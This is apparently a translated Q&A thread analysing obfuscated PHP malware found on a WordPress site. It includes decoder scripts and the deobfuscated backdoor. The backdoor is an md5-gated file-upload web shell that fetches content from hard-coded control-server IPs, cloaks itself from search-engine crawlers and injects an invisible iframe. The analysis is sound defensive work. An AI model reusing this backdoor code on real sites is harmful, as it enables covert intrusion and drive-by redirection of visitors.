我在wordpress安装上发现了一个似乎是恶意软件重新分发错误的病毒。我提取了它的代码,但它是以某种方式压缩的。我试图解压缩但它失败了。
Code中有许多目录,名称为uge.php,ghe.php等。
在这里您可以找到代码:http://pasted.co/dc05c112
你能帮我删除这个病毒,查找所有被黑客攻击的文件并修复wordpress安装吗?
答案 0 :(得分:4)
代码base64-decode和gzip-un压缩自身。它通过PHP create_function($vars, $function_code)函数创建一个匿名函数。只需echo代码而不是eval(),然后您就会看到结果。
我使用了这个转储脚本:
<php
$v = 'eNqm...'; //the string in the source above
echo gzuncompress(base64_decode($v));
?>
执行php并将输出重定向到文件。
$ php -f decoder.php > uncompressed.php
结果包含一些非ASCII可读字符,因此可能看起来有点模糊。不可读的ASCII字符实际上是变量名称的一部分。我通过将它们打印为十六进制字符来解码它们,因此源变得可读。还解码\xff编码的十六进制字符和\32编码的八进制字符。如果你这样做,那么你将会受到代码开头的欢迎。
<?php
class _bcbbed83f4
{
private static $_febfcfd79af5b5d3;
static
function _bdd3c3f4ff80($_96dbfd8c9e80c1)
{
if (!self::$_febfcfd79af5b5d3):
self::_ee9bfb8bc6eb9d(); /*Bloodninja: I lick your earlobe, and undo your watch.*/
endif;
return bAse64_DeCoDE(self::$_febfcfd79af5b5d3[$_96dbfd8c9e80c1]); /*Sarah19fca: mmmm, okay.*/
}
private static
function _ee9bfb8bc6eb9d()
{
self::$_febfcfd79af5b5d3 = array(
"_\xfb\xe7\xaa\xee\xc5\xb8\xb8\xa6" =>
/*Bloodninja: I take yo pants off, grunting like a troll.*/
"\115\x54\111\064L\x6aE3Ny4yN\104M=",
代码首先声明一个数组(C#中的/ dictionary,因为它似乎将string映射到另一个string)。在此数组中,声明了7,392个字符串。在整个代码中,注入了无意义的注释以降低可读性(尽管非常有趣,似乎是来自某些cybersex的东西)。您可以通过剥离注释来解码该数组中的每个字符串,然后在右侧解码Base64解码字符串。我编写了一个C#程序,它从源代码中扫描该字典,然后将每个调用替换为该数组;因此,所有字符串都被反混淆。
using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Text.RegularExpressions;
using System.Security.Cryptography;
namespace PHPDeobfusc
{
class Program
{
static void Main(string[] args)
{
//Read the source
byte[] content = File.ReadAllBytes(@"C:\Users\...\decompressed.txt");
//Replace non-ascii readable characters with their hexcode
StringBuilder output = new StringBuilder(content.Length);
bool insideString = false;
for (int i = 0; i < content.Length; i++)
{
byte c = content[i];
if (c == '"' && content[i-1] != '\\')
insideString = !insideString;
if (!IsASCIIReadable(c))
//Display it as hexchar, but in different ways if we are inside a string.
if(insideString)
output.Append(string.Format("\\x{0:x2}", (int)c));
else
output.Append(string.Format("{0:x2}", (int)c));
else
output.Append((char)c);
}
var decod = PHPStringDecode(output.ToString());
decod = StripComments(decod);
decod = ResolveArrayObfuscation(decod);
File.WriteAllText(@"C:\Users\...\Desktop\hexified3.php", decod);
}
static Dictionary<string,string> CreateLookupDict(string src)
{
var dict = new Dictionary<string, string>();
//Use a regex to find each line with "sourcekey" => "someBase64String"
foreach(Match m in Regex.Matches(src, "\\\"([^\\\"]*)\\\"\\s*=>\\s*\\\"([^\\\"]*)\\\""))
{
var key = m.Groups[1].Value;
var value = m.Groups[2].Value;
dict.Add(key, value);
}
return dict;
}
static string DotNetEncode(string input)
{
return input.Replace("\\", "\\\\").Replace("\"", "\\\"");
}
static string ResolveArrayObfuscation(string src)
{
var dict = CreateLookupDict(src);
//catch every call into that array
src = Regex.Replace(src, "_bcbbed83f4::_bdd3c3f4ff80\\(\\\"([^\\\"]*)\\\"\\)", delegate (Match m) {
string key = m.Groups[1].Value;
if (dict.ContainsKey(key)) //replace it with the value within our dictionary
{
var base64 = dict[key];
return "\"" + DotNetEncode(Encoding.UTF8.GetString(Convert.FromBase64String(base64))) + "\"";
}
return m.Value;
});
return src;
}
//Decode that hex and octal characters.
static string PHPStringDecode(string input)
{
Regex octal = new Regex(@"\\(\d{3})");
input = octal.Replace(input, delegate (Match m) {
//Escape the octal chart
int as_int = Convert.ToInt32(m.Groups[1].Value, 8);
char c = (char)as_int;
if(IsASCIIReadable((byte)as_int))
return c.ToString();
else
return string.Format("{0:x2}", as_int);
});
Regex hex = new Regex(@"\\x([a-fA-F0-9]{2})");
input = hex.Replace(input, delegate (Match m)
{
int as_int = Convert.ToInt32(m.Groups[1].Value, 16);
char c = (char)as_int;
if (IsASCIIReadable((byte)as_int))
return c.ToString();
else
return string.Format("{0:x2}", as_int);
});
return input;
}
static bool IsASCIIReadable(byte c)
{
if ((c <= 31 || c >= 127) && c != '\n' && c != '\r' && c != '\t')
return false;
return true;
}
}
}
它为您提供了清理的源代码。现在去使用像PHPStorm这样的PHP IDE,并开始重构代码,使其变得可读。这是一个更加反模糊的代码版本:
<?php
class _bcbbed83f4
{
private static $base64dict;
static
function decode_string($key)
{
if (!self::$base64dict):
self::create_dictionary();
endif;
return base64_decode(self::$base64dict[$key]);
}
private static
function create_dictionary()
{
self::$base64dict = array(
"_fbe7aaeec5b8b8a6" => "MTI4LjE3Ny4yNDM=",
"_e6cec0be84afbae6" => "MTI4LjE3Ny4yNDQuMTAw",
//goes on..
"_89bfa69ee79dc2dfedfd" => "cQ==",
);
}
}
error_reporting(0); //disable error reporting
$decoded_dict = array(
//originally, here were calls into the array, but they have already been resolved by the deobfuscator :)
"128.177.243",
"188.134.76.0"
//...
"173.194.0.0-173.194.255.255",
"173.255.112.0/20",
"192.158.28.0/22",
"192.178.0.0/15",
"193.142.125.0/24",
//...
);
function try_all_download_methods($url)
{
$result = "";
$result = @use_curl($url);
if ($result !== false):
return $result;
endif;
$result = @use_file($url);
if ($result !== false):
return $result;
endif;
$result = @use_fopen($url);
if ($result !== false):
return $result;
endif;
$result = @use_fsockopen($url);
if ($result !== false):
return $result;
endif;
$result = @use_fsockopen($url);
if ($result !== false):
return $result;
endif;
$result = @use_file_get_contents($url);
if ($result !== false):
return $result;
endif;
return "";
}
function use_curl($url, $unused_parameter = 0.57911929962106)
{
if (function_exists("curl_init") === false): //check if cURL is avaiable
return false;
endif;
$curl_state = curl_init(); //initiate it
curl_setopt($curl_state, constant("CURLOPT_URL") , $url); //pass it the url
curl_setopt($curl_state, constant("CURLOPT_RETURNTRANSFER") , true);
curl_setopt($curl_state, constant("CURLOPT_TIMEOUT") , 5);
curl_setopt($curl_state, constant("CURLOPT_HEADER") , NULL);
$curl_result = curl_exec($curl_state);
curl_close($curl_state);
if ($curl_result == ""):
return false;
endif;
return $curl_result; //return the downloaded string
}
function use_file_get_contents($file)
{
if (function_exists("file_get_contents") === false): //check if can use that function
return false;
endif;
$content = @file_get_contents($file);
if ($content == ""):
return false;
endif;
return $content;
}
function use_file($file)
{
if (function_exists("file") === false):
return false;
endif;
$line_array = @file($file);
$joined_string = @join("", $line_array);
if ($joined_string == ""):
return false;
endif;
return $joined_string;
}
function use_fopen($file, $unused_par = 0165433)
{
if (function_exists("fopen") === false):
return false;
endif;
$file_content = "";
$file_stream = @fopen($file, "r"); //open in read mode
if ($file_stream):
while (!feof($file_stream)):
$file_content.= fread($file_stream, 10000);
endwhile;
fclose($file_stream);
else:
return false;
endif;
if ($file_content == ""):
return false;
endif;
return $file_content;
}
function use_fsockopen($url)
{
if (function_exists("fsockopen") === false):
return false;
endif;
$url_array = @parse_url($url);
$host = $url_array["host"];
$path_and_query = $url_array["path"] . "?" . $url_array["query"];
//in the following line, two variables don't exist.
$socket = @fsockopen($host, 80, $errno_not_declared, $err_str_not_declared, 30);
if (!$socket):
return false;
endif;
$request = "GET " . $path_and_query . " HTTP/1.0\r\n";
$request.= "Host: " . $host . "\r\n\r\n";
fputs($socket, $request);
$response = "";
while (!feof($socket)):
$response.= fread($socket, 10000);
endwhile;
fclose($socket);
if ($response == ""):
return false;
endif;
list($undeclared_list_variable, $response) = explode('\r' . '\n' . '\r' . '\n' , $response);
return $response;
}
function use_socket_create($url)
{
if (function_exists("socket_create") === false):
return false;
endif;
$url_array = @parse_url($url);
$host = $url_array["host"];
$path_and_query = $url_array["path"] . "?" . $url_array["query"];
$host_ip = @gethostbyname($host);
$double_converted_host_ip = @long2ip(@ip2long($host_ip));
if ($host_ip != $double_converted_host_ip): //check the IP format validation by double-converting the ip from ip to long to ip again.
return false;
endif;
$socket = @socket_create(AF_INET, SOCK_STREAM ,getprotobyname("tcp"));
if (!@socket_connect($socket, $host_ip, 80)):
@socket_close($socket);
return false;
endif;
$request = "GET " . $path_and_query . " HTTP/1.0\r\n";
$request.= "Host: " . $host . "\r\n";
socket_write($socket, $request);
$response = "";
while ($received_chunk = socket_read($socket, 10000)):
$response.= $received_chunk;
endwhile;
@socket_close($socket);
if ($response == ""):
return false;
endif;
list($unused_list_variable_2, $response) = explode('\r' . '\n' . '\r' . '\n' , $response);
return $response;
}
function compare_ips($other_source_string, $source_string)
{
$arr1 = explode("/", $source_string);
$ip_array = explode(".", $arr1[0]);
foreach($ip_array as & $binary_string):
//converts the number from decimal to a binary string and pads it to 8 characters length by left-padding zeroes
$binary_string = str_pad(decbin($binary_string) , 8 , "0", STR_PAD_LEFT);
endforeach;
$ip_array = substr(join("", $ip_array) , 0, $arr1[1]);
$arr2 = explode(".", $other_source_string);
foreach($arr2 as & $binary_string):
$binary_string = str_pad(decbin($binary_string) , 8 , "0", STR_PAD_LEFT);
endforeach;
$arr2 = substr(join("", $arr2) , 0, $arr1[1]);
return $arr2 == $ip_array;
}
$_a9a4fbb7d3d5f4eaf9 = ""; //two unused variables..
$_cfbbfe919aa1 = "";
$client_ip = $_SERVER["REMOTE_ADDR"];
$client_maybe_proxy = $_SERVER["HTTP_X_REAL_IP"];
if (strpos($client_ip, ":") || strpos($client_maybe_proxy, ":")):
exit;
endif;
$hostname_client = gethostbyaddr($client_ip);
$hostname_proxy = gethostbyaddr($client_maybe_proxy);
//is this is a google bot?
if (preg_match("/google/i", $hostname_client) || preg_match("/google/i", $hostname_proxy)):
else: //does it come from some site we don't like?
if (preg_match("/yandex/i", $hostname_client) || preg_match("/yandex/i", $hostname_proxy) || preg_match("/yndx/i", $hostname_client) || preg_match("/yndx/i", $hostname_proxy) || preg_match("/mail.ru/i", $hostname_client) || preg_match("/mail.ru/i", $hostname_proxy) || preg_match("/rambler/i", $hostname_client) || preg_match("/rambler/i", $hostname_proxy) || preg_match("/msn/i", $hostname_client) || preg_match("/msn/i", $hostname_proxy) || preg_match("/microsoft/i", $hostname_client) || preg_match("/microsoft/i", $hostname_proxy) || preg_match("/bing/i", $hostname_client) || preg_match("/bing/i", $hostname_proxy)):
else:
$_decoded_dict = $decoded_dict; //make a reference to the base64-decoded dictionary
$success = false;
foreach($_decoded_dict as $decoded_str): //go through every member in that dict
$decoded_str = trim($decoded_str);
if (strpos($decoded_str, "/")): //is this a ip in CIDR notation? (e.g. 192.168.0.0/24)
if (compare_ips($client_ip, $decoded_str) || compare_ips($client_maybe_proxy, $decoded_str)):
$success = true; //this url / ip WAS found in the dictionary. break.
break;
endif;
else:
if ($decoded_str[strlen($decoded_str) - 1 ] === "0"): //is the last character a '0'?
$start_of_subnet = substr($decoded_str, 0, strlen($decoded_str) - 1) . "1"; //take everything but the last character and append a '1'.
$end_of_subnet = substr($decoded_str, 0 , strlen($decoded_str) - 1) . "254"; //replace the end with '254'
if (ip2long($start_of_subnet) && ip2long($end_of_subnet)):
$client_ip_as_long = ip2long($client_ip); //convert the ip addresses to numbers
$client_proxy_as_long = ip2long($client_maybe_proxy);
if ($client_ip_as_long >= ip2long($start_of_subnet) && $client_ip_as_long <= ip2long($end_of_subnet)):
$success = true; //the IP adress of the client ip IS within this subnet
break;
else:
if ($client_proxy_as_long >= ip2long($start_of_subnet) && $client_proxy_as_long <= ip2long($end_of_subnet)):
$success = true; //sucess also here if the client PROXY IP is within this subnet.
break;
endif;
endif;
endif;
else:
if (strpos($decoded_str, "-")): //is there a '-' in the string? This is tor the strings of the kind 192.168.0.1-192.168.0.255
$exploded_arr = explode("-", $decoded_str); //explode it
$client_ip_as_long = ip2long($client_ip); //same stuff as above
$client_proxy_as_long = ip2long($client_maybe_proxy);
if ($client_ip_as_long >= ip2long(trim($exploded_arr[0])) && $client_ip_as_long <= ip2long(trim($exploded_arr[1]))):
$success = true;
break;
else:
if ($client_proxy_as_long >= ip2long($exploded_arr[0]) && $client_proxy_as_long <= ip2long($exploded_arr[1])):
$success = true;
break;
endif;
endif;
else:
if (ip2long($decoded_str) > -1):
if ($decoded_str === $client_ip || $decoded_str === $client_maybe_proxy):
$success = true;
break;
endif;
endif;
endif;
endif;
endif;
endforeach;
function download_stuff_from_server()
{
$magic_ip = "87.118.108.89";
$query_string = $_SERVER["QUERY_STRING"];
$server_name = $_SERVER["SERVER_NAME"];
$www_dot = "www.";
$starts_with_www = stripos($server_name, $www_dot);
if ($starts_with_www === false):
$server_name = "www." . $server_name;
endif;
$url = "http://" . $magic_ip . "/" . $server_name . "/" . $query_string;
return try_all_download_methods($url);
}
if (md5(@$_GET["b"]) === "3edb21a5f513ee1a610c8ad1835d4512"): //compare the b GET parameter with the magic URL to get access to this form!
$success = true;
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Go\"></form>";
if ($_POST["_upl"] == "Go"):
if (@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])): //Copy the given file to the server
echo "<b>Go</b><br /><br />";
else:
echo "<b>Up</b><br /><br />";
endif;
endif;
endif;
if (!$success): //the user that has accessed this shell is new / not one of the allowed users.
//Inject a JavaScript sothat we can trace him. This is a basically a document.write(<invisible iframe>)
$javascript_src = "<script> var _0x5254 = [\"<frameset rows=\\\"*,0\\\" framespacing=\\\"0\\\" border=\\\"0\\\" frameborder=\\\"NO\\\"><frame src=\\\"http://box.mimia.berlin/apply/\\\" noresize=\\\"\\\" scrolling=\\\"auto\\\"></frameset>\", \"write\"]; document[_0x5254[1]](_0x5254[0]);</ script > ";
$magic_file = download_stuff_from_server();
$to_echo = $javascript_src . $magic_file;
echo $to_echo;
else:
$magic_file = download_stuff_from_server();
echo $magic_file;
endif;
endif;
endif;
if (isset($_GET["q"])): //Option to output the md5 parameter of this file (after uploading).
echo md5(file_get_contents(__FILE__));
endif;;
此代码的14,000多行只是一个包含IP地址和IP范围的字符串数组。我们稍后再看一下。在开始时,我们看到已经编写了6个函数,它们都试图以不同的方式下载文件。第一个选项是cURL,然后是PHP函数file(),fopen(),fsockopen(),socket_create()和file_get_contents()。因此,能够从其他服务器下载文件对他们来说似乎非常重要,如果他们尝试6种不同的下载方法。
更有趣的是,正在下载的内容以及这些IP地址的用途。代码以
开头$client_ip = $_SERVER["REMOTE_ADDR"];
$client_maybe_proxy = $_SERVER["HTTP_X_REAL_IP"];
然后查找这些IP地址的DNS名称,并使用正则表达式阻止特定域:
if (preg_match("/google/i", $hostname_client) || preg_match("/google/i", $hostname_proxy)):
else: //does it come from some site we don't like?
if (preg_match("/yandex/i", $hostname_client) || preg_match("/yandex/i", $hostname_proxy) || preg_match("/yndx/i", $hostname_client) || preg_match("/yndx/i", $hostname_proxy) || preg_match("/mail.ru/i", $hostname_client) || preg_match("/mail.ru/i", $hostname_proxy) || preg_match("/rambler/i", $hostname_client) || preg_match("/rambler/i", $hostname_proxy) || preg_match("/msn/i", $hostname_client) || preg_match("/msn/i", $hostname_proxy) || preg_match("/microsoft/i", $hostname_client) || preg_match("/microsoft/i", $hostname_proxy) || preg_match("/bing/i", $hostname_client) || preg_match("/bing/i", $hostname_proxy)):
else: //real code starts here
如果您通过了这些检查,代码将尝试在开头的数组中的IP地址列表中找到您的IP地址。其中存储了3种IP地址:普通IP地址,如66.249.66.216,IP地址采用CIDR子网表示法,如8.8.4.0/24,或类似66.249.60.0-66.249.95.255。如果您来自其中一个IP地址,则会将布尔变量success设置为true。让我们看看它对检查结果的反应如何:
if (!$success): //the user that has accessed this shell is new / not one of the allowed users.
//Inject a JavaScript sothat we can trace him. This is a basically a document.write(<invisible iframe>)
$javascript_src = "<script> var _0x5254 = [\"<frameset rows=\\\"*,0\\\" framespacing=\\\"0\\\" border=\\\"0\\\" frameborder=\\\"NO\\\"><frame src=\\\"http://box.mimia.berlin/apply/\\\" noresize=\\\"\\\" scrolling=\\\"auto\\\"></frameset>\", \"write\"]; document[_0x5254[1]](_0x5254[0]);</ script > ";
$magic_file = download_stuff_from_server();
$to_echo = $javascript_src . $magic_file;
echo $to_echo;
else:
$magic_file = download_stuff_from_server();
echo $magic_file;
endif;
有趣。如果您不在这些IP地址的列表中,服务器将向您注入一个javascript,这将打开一个没有边框的<iframe>,并且没有宽度/高度使其不可见。您在此处被迫访问的网址是http://box.mimia.berlin/apply/。根据{{3}},域名mimia.berlin已于2014年9月1日注册。那么download_stuff_from_server()做什么呢?
function download_stuff_from_server()
{
$magic_ip = "87.118.108.89";
$query_string = $_SERVER["QUERY_STRING"];
$server_name = $_SERVER["SERVER_NAME"];
$www_dot = "www.";
$starts_with_www = stripos($server_name, $www_dot);
if ($starts_with_www === false):
$server_name = "www." . $server_name;
endif;
$url = "http://" . $magic_ip . "/" . $server_name . "/" . $query_string;
return try_all_download_methods($url);
}
在这里,我们可以看到静态IP地址。本地被黑客入侵的服务器名称用于组成http://87.118.108.89/www.hacked_domain.com/形式的URL。无论该服务器应该返回什么,它现在都处于脱机状态。该IP地址绝对充当控制服务器,因为该内容的结果正显示给shell用户/网站查看器。所以现在,我们通过注入一个javascript强制向域请求并记录被黑客入侵的服务器地址,看到了某种类型的IP地址记录。但是shell的功能呢?接近结束,你会看到
if (md5(@$_GET["b"]) === "3edb21a5f513ee1a610c8ad1835d4512"): //compare the b GET parameter with the magic URL to get access to this form!
$success = true;
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Go\"></form>";
if ($_POST["_upl"] == "Go"):
if (@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])): //Copy the given file to the server
echo "<b>Go</b><br /><br />";
else:
echo "<b>Up</b><br /><br />";
endif;
endif;
endif;
这似乎echo是一个经典的上传表单(您可以在其中看到HTML代码),用于文件上传,与copy()函数一起使用。但是,如果我们在URL查询中为b参数提供md5哈希的正确魔术值,我们只会获得该表单。最有趣的。
从根本上说,如果我们在URL中提供echo参数,那么md5()似乎有一些调试代码 - 当前脚本文件的q 。
if (isset($_GET["q"])): //Option to output the md5 parameter of this file.
echo md5(file_get_contents(__FILE__));
endif;;
我们在这里有什么?唯一真正的功能是我们在被黑客入侵的服务器上获得上传表单。经典文件上传,包含在10行代码中。其余代码围绕一个包含IP地址和范围的巨大数组旋转,从中确定是否有上传形式。也许这是一个清除使用shell的黑客名单?或者它可能会记录一些?事实是,在执行期间不会修改数组(在此脚本中 )。事实是,超过约7,400个IP地址列表巨大。事实上,该网页的用户/浏览者可以通过访问http://box.mimia.berlin/apply/网站进行记录,该网站可能是针对这些黑客活动的特别租用服务器,位于德国。鉴于该网站现在不再可用,因为注册于2015年6月20日到期,黑客现在可能处于非活动状态。分析还揭示了某种命令和控制服务器,从中向shell用户显示内容。 BTW,谷歌搜索魔法md5值3edb21a5f513ee1a610c8ad1835d4512将导致一个网站;它可能是一种标记受感染页面的方法。
在那个页面上,你可以通过google搜索上面的字符串,源代码似乎在明文中。字符串混淆是不同的,它通过异或完成。最有趣的是,变量名称是明文,函数名称是真实的,并且有对另一个网站的引用。
//This is my own decoder code for decoding one part
<?php
class _afe2f7befb999fa1
{
private static $dict;
static
function decrypt($key, $xorKey)
{
if (!self::$dict):
self::createDict();
endif;
$xorKeyLen = 8; //array_len($xorKey); //strlen($xorKey);
$decoded_str = base64_decode(self::$dict[$key]);
for ($i = 0 , $len_dec = strlen($decoded_str); $i !== $len_dec; ++$i):
$decoded_str[$i] = chr(ord($decoded_str[$i]) ^ $xorKey[$i % $xorKeyLen]);
endfor;
return $decoded_str;
}
private static
function createDict()
{
self::$dict = array(
"_a1def5c3cfd4e2e896" => "Oe2z4ojspsN//7j1o+amwyuw9Prxj+3KOva57pHkoMN/pf2jxLHnnGa27LnEq/2efaPQi9j1qMo6uOCh2Nqa6A3OmNOnopj4GsqE3q/Rm+QR3/rcx4jDiTf3/bzcoZb+GsqLxK7e7v4ayovErtqH7BLd+tzHiMOJOfGz5ZHg6ZB/uqr2i6vrllKS+fGT9viNYriu9Y7sucIssPnpk6npiTnxs+WR4OCWUpK059yt7d0w6+yhwbj0jTn5sfKZrOnWUpL56ZOl9I1976r20qfniTf35oz2+MSnVryt4Ijt6ZB/urX1iPXzgnC8uuSS4abAPvGzrtjtpoJ76LzmmafyoFWRr+SI8LvDf/+49aPwu8EAoeS41KG5zCvw9Lrxj7SgVZXX54nrqtk297OhmvCnzgD7qPOO4KfZAOu17ozarcIy+bTv1KyyoFWRr+SI8LvDf/+49aPwu8EAoeS41KKh2Svo567T6aDOOvau5J/qp8tx96/m0/ahwijHseiS7rqCLPCy9qPhpsA+8bPekuSkyHHspfXb" . "rPKgVe" . "U=",
);
}
}
echo _afe2f7befb999fa1::decrypt("_a1def5c3cfd4e2e896", array(ord('_'), 0x98, 0xdd, 0x81, 0xfc, 0x85, 0xc9, 0xad) /*"_98dd81fc85c9ad"*/);
?>
//real code starts here
<?php
error_reporting(0);
$ips = array(
"128.177.243",
"128.177.244.100",
"128.177.244.86",
"194.112.94.250",
"194.112.94.251",
//...
"188.134.76.0"
);
function get_url_999($url)
{
$content = "";
$content = @trycurl_999($url);
if ($content !== false) return $content;
$content = @tryfile_999($url);
if ($content !== false) return $content;
$content = @tryfopen_999($url);
if ($content !== false) return $content;
$content = @tryfsockopen_999($url);
if ($content !== false) return $content;
$content = @tryfsockopen_999($url);
if ($content !== false) return $content;
$content = @try_file_get_contents_999($url);
if ($content !== false) return $content;
return '';
}
function get_cont(){
$gendomain = "84.19.188.43";
$page = $_SERVER['QUERY_STRING'];
$ho = $_SERVER['SERVER_NAME'];
$findme = "www.";
$pos1 = stripos($ho, $findme);
if ($pos1 === false) {
$ho = "www.".$ho;
}
$path = "http://$gendomain/$ho/$page";
return get_url_999($path);
}
function func_current_shop_domain(){
return get_url_999('http://licenseconf.org/show_links/show_domain_name.txt');
}